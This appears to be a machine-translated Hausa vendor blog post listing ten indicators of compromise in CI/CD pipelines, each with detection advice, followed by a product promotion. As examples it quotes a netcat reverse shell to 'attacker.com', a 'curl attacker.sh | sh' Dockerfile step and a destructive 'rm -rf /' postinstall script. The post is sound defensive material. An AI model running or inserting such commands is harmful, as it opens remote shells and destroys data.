Manyan Alamomi 10 na Sasantawa a cikin CI/CD Pipelines

Gabatarwa: Menene Alamomin Sasantawa a Tsaron Yanar Gizo?

Alamun sulhu sune alamun gargaɗi na farko da ke nuna cewa tsarinka ko pipeline ana iya kai masa hari. A cikin kalmomi masu sauƙi, alamomin sasantawa alamun da maharan suka bari, kamar baƙon abu ne logins, canje-canjen fayiloli, ko ɓoye malware. A cikin Tsaron yanar gizo na IOC, suna aiki kamar zanen yatsa a wurin aikata laifi, suna ba ku shaida bayyananne cewa wani abu ba daidai ba ne. Saboda haka, lokacin da masu haɓaka suka tambaya menene alamun sulhu, amsar ba ta takaita ga sabar ko firewalls ba, har ma ta haɗa da haɗarin da aka ɓoye a cikin zamani CI/CD pipelines.

A cikin waɗannan pipelines, masu kai hari za su iya yin ɓarna ga lambar, su saka abubuwan da suka shafi mugunta, ko su canza matakan ginawa ba tare da an lura da su ba. Duk da haka, yawancin jagororin har yanzu suna mai da hankali ne kawai kan sabar ko hanyoyin sadarwa. Sakamakon haka, sarkar samar da software ta zama ɗaya daga cikin mafi sauƙin hari.

Shi ya sa ake samun alamun sassauci a cikin CI/CD pipelines yana da mahimmanci. Fiye da komai, yana taimaka wa ƙungiyoyi su toshe malware, kare sirri, da kuma tsare kowane mataki na isar da software.

Manyan Alamomi 10 na Sasantawa a cikin CI/CD Pipelines

Lokacin da ake bayanin alamun sulhu, yawancin jerin suna mai da hankali ne akan sabar ko hanyoyin sadarwa. CI/CD pipelines, maharan suna barin alamun yatsu daban-daban. Gane waɗannan sigina yana da mahimmanci don kariya mai ƙarfi. Ga waɗannan alamun tsaro guda 10 da IOC ya kamata kowane mai haɓakawa da injiniyan tsaro ya kula da su.

1. Canje-canje Masu Zargi Game da Dogaro da Kai

Ɗaya daga cikin manyan alamomin da ke nuna rashin jituwa a cikin iyali pipelines sabuntawa ne na dogaro da kai kwatsam. Masu kai hari galibi suna amfani da wurin masu haɓaka aminci a cikin manajojin kunshin don ƙara fakiti masu haɗari.

Misali, a cikin npm a package.json bambancin zai iya haɗawa da:

Irin waɗannan canje-canje na iya zama kamar babu matsala amma suna iya shigar da lambar trojanized a cikin kowane gini.

Imfani: ginannun da aka lalace sun gaji malware daga tushe.

Gano: tilasta sake dubawa game da dogaro da kai, bin diddigin bambance-bambancen fayil ɗin kullewa, da kuma duba sabbin fakiti a kowane lokaci.

2. Lambar da aka ɓoye a cikin Gine-gine 

Marubutan malware suna dogara ne akan ɓoye bayanai don kauce wa sake dubawa. Sakamakon haka, wannan alamar sulhu a cikin CI/CD pipelines na iya zama ɗaya daga cikin mafi wahalar kamawa. A gaskiya ma, abubuwan da aka ɓoye galibi suna zamewa cikin ɗakunan karatu ko hotunan kwantena ba tare da sanarwa ba.

Misali:

  • Kunshin PyPI yana amfani da base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Hoton Docker cike yake da nau'ikan binary na UPX marasa mahimmanci.
  • JavaScript cike yake da \x41\x42 tserewa ɓoye masu satar takardun shaida.

Imfani: Lambobin da aka ɓoye suna aiki a hankali yayin gini ko lokacin aiki, wanda hakan ya sa wannan ya zama muhimmiyar alama a cikin tsaron yanar gizo na IOC.
Gano: hada SAST tare da na'urar duba malware don nuna alamar lambar da aka ɓoye ko aka tattara. Fiye da komai, a ɗauki ɓoyewa a matsayin alamar ja wadda ta cancanci ƙarin bincike.

3. Sirrin da aka Tona a Git: Hadarin Tsaron Yanar Gizo na IOC na Gargajiya

CI/CD pipelinesau da yawa suna gadon sirri kai tsaye daga ma'ajiyar bayanai. Duk da haka, lokacin da asirai suka bayyana a Git, sun zama ɗaya daga cikin amsoshi mafi bayyanannu ga tambayar "menene alamun sulhu a cikin pipelines?” Da zarar takardun shaida sun sauka a Git, masu kai hari za su iya amfani da su har abada.

Misali:

  • A .env fayil dauke da AWS_SECRET_KEY=.
  • An tura Alamu a ciki config.json.
  • Sirrin har yanzu yana bayyane a tarihin Git koda bayan an cire shi.

Imfani: Maɓallan da aka fallasa suna ba wa maharan damar shiga kai tsaye zuwa CI/CD pipelines, tsarin girgije, ko rumbun adana bayanai. Saboda haka, wannan yana ɗaya daga cikin mafi haɗari alamun sulhu.
Gano: amfani pre-commit hooks da ayyukan CI don duba sirri, da kuma soke maɓallan da suka zube nan take. Bugu da ƙari, aiwatar da gyara ta atomatik don rage tagogi masu fallasa.

4. An yi wa rauni Pipeline Saita: Ɓoyayyun Alamomi na Sasantawa

Pipeline saitunan suna da ƙimar gaske saboda Sauye-sauye sau da yawa yakan kwace dukkan tsarin aikiSakamakon haka, an yi wa pipeline fayiloli babban haɗarin tsaro ne na IOC wanda kayan aikin sa ido na gargajiya ba safai ake gano su ba.

Misali:

  • A cikin Ayyukan GitHub:

  • A cikin GitLab: an ƙara wani mummunan aiki .gitlab-ci.yml wanda ke zubar da bayanai masu mahimmanci.
  • A cikin Jenkins: sh "nc -e /bin/bash attacker.com 4444".

Imfani: Waɗannan canje-canjen da ba a amince da su ba suna canza ku pipeline a matsayin wata hanya ta dindindin ga masu kai hari, wanda a bayyane yake yana wakiltar alamar sulhu.
Gano: Aiwatar da saitunan da aka sanya hannu, buƙatar amincewar PR, da kuma sa ido kan ayyukan da ba a zata ba. Bugu da ƙari, saita guardrails wanda ke toshe hanyoyin aiki da aka canza ta atomatik.

5. Gata IaC Mafiya Hankali 

Ma'anar tsarin ababen more rayuwa mara kyau sau da yawa suna haifar da ɓoyayyun ƙofofi na baya. Sakamakon haka, kurakurai masu gata a cikin IaC haɗari ne na tsaro a yanar gizo na IOC.

Misali:

  • Tallafin Kubernetes ga masu hannun jari privileged: true.
  • Jadawalin kwalkwali yana nuna ayyuka tare da 0.0.0.0:22.

Imfani: Masu kai hari suna samun damar shiga matakin tushe ko kuma fallasa ayyukan cikin gida a bainar jama'a. Saboda haka, waɗannan matsalolin suna faɗaɗa yanayin harin sosai.
Gano: Aiwatar IaC Ana dubawa don aiwatar da mafi ƙarancin gata kafin haɗuwa. Bugu da ƙari, tabbatar da cewa an sake duba kowane tsari a matsayin wani ɓangare na pipeline.

6. Halayen Gina Jiki Marasa Kyau 

Masu kai hari kan saba canzawa pipeline Halayyar yin zamewa cikin ayyukan mugunta. A wata ma'anar, ayyukan ginawa na musamman ɗaya ne daga cikin amsoshi mafi bayyanannu ga abin da ke nuna alamun sulhu a cikin CI/CD pipelines.

Misali:

  • Ginawa yana yin buƙatun hanyar sadarwa na fita zuwa wurare masu ban mamaki.
  • Wani aikin Node.js ba zato ba tsammani ya haifar da PowerShell a lokacin npm install.
  • Aikin CI yana sauke manyan binary waɗanda ba a bayyana su a cikin rubutun gini ba.

Imfani: Gine-ginen da aka lalata na iya zama wuraren rarraba malware. Fiye da komai, suna yaɗa munanan ayyuka a duk faɗin amfani da malware.
Gano: Kula da tsarin ginin don gano hanyoyin da ba a zata ba ko haɗin da ba a zata ba. Bugu da ƙari, saita gano abubuwan da ba su dace ba don nuna halaye a waje da al'ada.

7. Rubutun Kunshin Mallaka a matsayin Hadarin Tsaron Yanar Gizo na IOC

Manajan fakiti suna tallafawa zagayowar rayuwa hooks wanda maharan ke amfani da shi. Saboda haka, rubutun mugunta a cikin npm, PyPI, ko Dockerfiles alamu ne masu ƙarfi na sulhu.

Misali:

  • npm: postinstall rubutun yana gudana rm -rf / ko kuma nuna alama ga C2.
  • PPI: setup.py aiwatar da lambar Python da aka ɓoye lokacin shigarwa.
  • Dockerfile: RUN curl attacker.sh | sh.

Imfani: Harin yana gudana yayin shigarwa, kafin a gwada duk wani lokacin gudu. Saboda haka, masu haɓaka software ba za su taɓa lura ba har sai lokacin ya yi latti.
Gano: Duba bayanan kunshin don rubutun shigarwa. Bugu da ƙari, iyakance haɗari hooks in CI/CD ayyuka don rage fallasa.

8. Alamomin Guba a Rijista na Sasantawa

Masu kai hari suna maye gurbin ko gyara kayan tarihi a cikin rajista, kuma waɗannan abubuwan da suka faru misalai ne na littafin karatu na abin da ke nuna rashin jituwa a cikin sarkar samar da kayayyaki pipelines.

Misali:

  • Alamar hoton Docker an sabunta ta a hankali tare da wani tsari mai kama da trojanized.
  • An maye gurbin wani fakiti na ciki da sigar guba.
  • yin sukuwa da sunan npm, kamar lodash-proxy.

Imfani: Kowace gini da ke amfani da kayan tarihi na rajista tana fuskantar matsala. Ba wai kawai hakan ba, amma yarjejeniyar ta yaɗu zuwa ga ayyukan da ke ƙasa.
Gano: A tabbatar da sa hannu da kuma tantance sa hannu a duk wani rajista da aka cire. Bugu da ƙari, a bi diddigin asalin kayan tarihi tare da SBOM inganci.

9. Ayyukan Mai Amfani marasa kyau a matsayin Shaida ta IOC

Asusu masu lalacewa kusan koyaushe suna barin alamun da ba su dace ba. Saboda haka, ɗabi'ar masu haɓaka da ba a saba gani ba alama ce mai ƙarfi ta sulhu.

Misali:

  • Commitan tura s da ƙarfe 3 na safe agogon yankin.
  • Amincewa da PR ta asusun hutu.
  • Pipelines ya haifar da mitar da ba a saba gani ba.

Imfani: Masu kai hari suna amfani da takardun shaidar da aka sata don saka canje-canje marasa kyau. Bayan haka, ba a ba da izini ba commits yana haɗuwa cikin sauƙi zuwa ayyukan aiki na yau da kullun.
Gano: Monitor SCM aiki don abubuwan da ba su dace ba, tilasta MFA, da kuma juya alamun akai-akai. Bugu da ƙari, faɗakar da kai kan abin da ake zargi commit ko kuma tsarin amincewa.

10. Rashin Ingantaccen Tsaro ko Binciken Sa hannu a Tsaron Yanar Gizo na IOC

Na gama gari amma an yi watsi da shi alamar sulhu rashin daidaito ko binciken sa hannu ne. A cikin tsaron yanar gizo na IOC, waɗannan binciken suna tabbatar da cewa lambar ko kayan tarihi na gaske ne. pipelines fallasa.

misalan:

  • Hash ɗin SHA256 bai dace da jimlar da ake tsammani ba.
  • Sa hannun GPG da ya ɓace ko kuma bai dace ba.
  • An SBOM nuna kayan tarihi marasa sa hannu.

Imfani: Rashin daidaito sau da yawa yana nufin yin kuskure, guba a rajista, ko allurar malware.

Gano: Yi amfani da na'urar duba sa hannu ta atomatik, tilasta tabbatar da ingancin checksum, da kuma toshe abubuwan da ba a sanya hannu ba. Fiye da komai, ɗauki kowane binciken da ya gaza a matsayin shaidar daidaito.

CI/CD Alamomin Sasantawa a Kallo

Alamar Yarjejeniya (IOC) Tasiri a ciki CI/CD Pipelines Yadda ake Ganowa
Canje-canje Masu Zargi Game da Dogaro da Kai Masu kai hari suna shigar da ɗakunan karatu masu cutarwa a cikin manajojin kunshin, wanda ke haifar da lalacewar ginin. Bin diddigin bambance-bambancen fayil ɗin kullewa, tilasta sake dubawa game da dogaro, da kuma duba abubuwan dogaro akai-akai.
Lambar da aka ɓoye a cikin Gine-gine Ana aiwatar da ayyukan da aka ɓoye yayin gini ko lokacin aiki ba tare da an gano su ba. amfani SAST da kuma bincika ƙwayoyin cuta don yin alama ga tsarin lambar base64, hex, ko kuma tsarin lambobi masu tarin yawa.
Asirin da aka Tona a Git Alamun da aka fallasa ko maɓallan API suna ba wa maharan damar shiga kai tsaye zuwa ga mahimman tsarin. Gudanar da binciken sirri a cikin Git hooks kuma soke takardun shaidar da aka ɓuya ta atomatik.
An takura Pipeline Ƙungiyoyi Gyaran hanyoyin aiki suna ba da damar tace bayanai ko dagewa a ciki CI/CD. Ana buƙatar amincewar PR, aiwatar da saitunan da aka sanya hannu, da kuma sa ido pipeline canje-canje.
Kyauta IaC Mafiya Hankali Matsayin da ya wuce gona da iri ko rashin tsaro na ɓoye yanayin girgije. Duba fayilolin Terraform, Kubernetes, da Helm don aiwatar da mafi ƙarancin gata.
Halayen Gine-gine marasa Ma'ana Pipelineana amfani da su azaman wuraren rarraba malware ko don motsi a gefe. Yi nazarin rajistar gini don saukarwa, tsari, ko kira da ba a zata ba.
Rubuce-rubucen Kunshin Mummunan Ɓoyayyun rubutun kafin/bayan shigarwa suna haifar da ƙarin kuɗi kafin gwajin lokacin aiki. Toshe rubutun npm/PyPI masu haɗari kuma a takaita aiwatarwa a ciki CI/CD ayyuka.
Guba a Rijista Abubuwan tarihi da aka yi wa Trojan sun maye gurbin amintattun hotuna ko binary a cikin rajista. Tabbatar da checksums, tilasta tabbatar da sa hannu, da kuma duba rajistar a hankali.
Ayyukan Mai Amfani marasa kyau Asusun da aka lalata suna tura mugunta commits ko abin jawowa pipelines. Aiwatar da MFA, sa ido commits don rashin daidaituwa, da kuma nazarin login alamu.
Rashin Ingantaccen Bincike ko Binciken Sa hannu Yana nuna lambar da aka yi wa lahani, abubuwan da suka dogara da su, ko hotuna da ke shiga cikin pipeline. Duba daidaito ta atomatik da kuma toshe abubuwan da ba a sanya hannu ko waɗanda ba su dace ba.

Dalilin da yasa Tsaron Yanar Gizo na Gargajiya na IOC Ya Rasa CI/CD kasada

Yawancin ƙungiyoyi sun riga sun sa ido kan alamun sulhu a kan sabar, kwamfutoci, ko hanyoyin sadarwa. Duk da haka, wannan hanyar gargajiya ta IOC ta yi watsi da ita CI/CD pipelines, waɗanda yanzu suna ɗaya daga cikin manyan wuraren kai hari. A zahiri, pipelines suna nuna alamun sassauci na musamman waɗanda kayan aikin gargajiya ba za su iya gano su ba.

Alamomin Sasantawa a Tsaron Gargajiya

A cikin tsarin tsaro na IOC na yau da kullun, yawanci ana mai da hankali kan:

  • sabon abu logins ko adireshin IP waɗanda ke nuna sata takardun shaidar.
  • Hashes na fayiloli ko canje-canjen rajista waɗanda ke bayyana malware.
  • Zirga-zirgar da ba a zata ba wadda ke nuna fitar da bayanai.

Waɗannan sanannun alamomi ne kuma ana bin diddigin su a cikin MITER ATT&CK tsarin, wanda ke nuna halaye da dabarun abokan gaba na yau da kullun. Waɗannan sigina ne masu amfani. Duk da haka, galibi suna aiki ne ga tsarin aiki ko hanyoyin sadarwa na kamfanoni. Sakamakon haka, suna rasa ɓarnar da ke faruwa a baya a cikin sarkar samar da software.

Me ya sa CI/CD Pipelines Sun bambanta

CI/CD pipelines yanayi ne na atomatik inda masu haɓaka ke aiki commit lambar, abubuwan da suka dogara da ja, da kuma gina sakin. Masu kai hari sun san cewa sulhu a nan yana faruwa a kowane shiri. Saboda haka, menene alamun sulhu a ciki CI/CD pipelineSuna kama da juna sosai:

  • An ƙara wani mummunan dogaro a hankali zuwa package.json ko requirements.txt.
  • Maɓallan API ko alamun da aka fallasa a cikin Git commitfayilolin s ko .env.
  • Lambar da aka ɓoye a cikin fakitin npm ko PyPI.
  • Fayilolin Terraform ko Kubernetes waɗanda ke da tsoffin fayiloli marasa tsaro kamar private: true.
  • Pipeline an gyara ayyukan don fitar da bayanai ko buɗe ƙofofin baya.

Waɗannan alamun sulhu a cikin CI/CD kasance ba a iya gani standard kayan aikin tsaro.

Gibin Tsaron Yanar Gizo na IOC

Duk da cewa ƙungiyoyi da yawa sun fahimci muhimmancin alamun sulhu, har yanzu suna dogara ne kawai akan ganowa daga sabar da rajistar cibiyar sadarwa. Saboda haka, maharan za su iya guba ga ginawa ko saka malware ba tare da barin alamun da aka saba gani ba. Wannan shine dalilin da ya sa abubuwan da suka faru kamar XZ Utils na baya ko fakitin npm masu cutarwa ba a gano su ba har sai sun kai ga samarwa.

Irin waɗannan yarjejeniyoyi na sarkar samar da kayayyaki suma an fi mayar da hankalinsu ta hanyar CISJagorar tsaron sarkar samar da kayayyaki ta A, wanda ke gargadin cewa maharan suna ƙara kai hari CI/CD pipelines da rajista.

Hanyar tafi

Tsaron yanar gizo na gargajiya na IOC ya zama dole amma bai isa ba. Fiye da komai, ƙungiyoyi dole ne su gane alamun sassauci musamman CI/CD pipelines. Sai kawai a lokacin ne za su iya gano lambar mugunta ko pipeline cin zarafi kafin ya bazu a cikin mahalli.

kayan aikin nazarin kayan aikin sca-tools-composition
Fifiko, gyara, da kuma kare haɗarin software ɗinka
Sami Asusunka Kyauta.
Babu katin bashi da ake bukata.

Tabbatar da Haɓaka Software da Isarwarka

tare da Xygeni Product Suite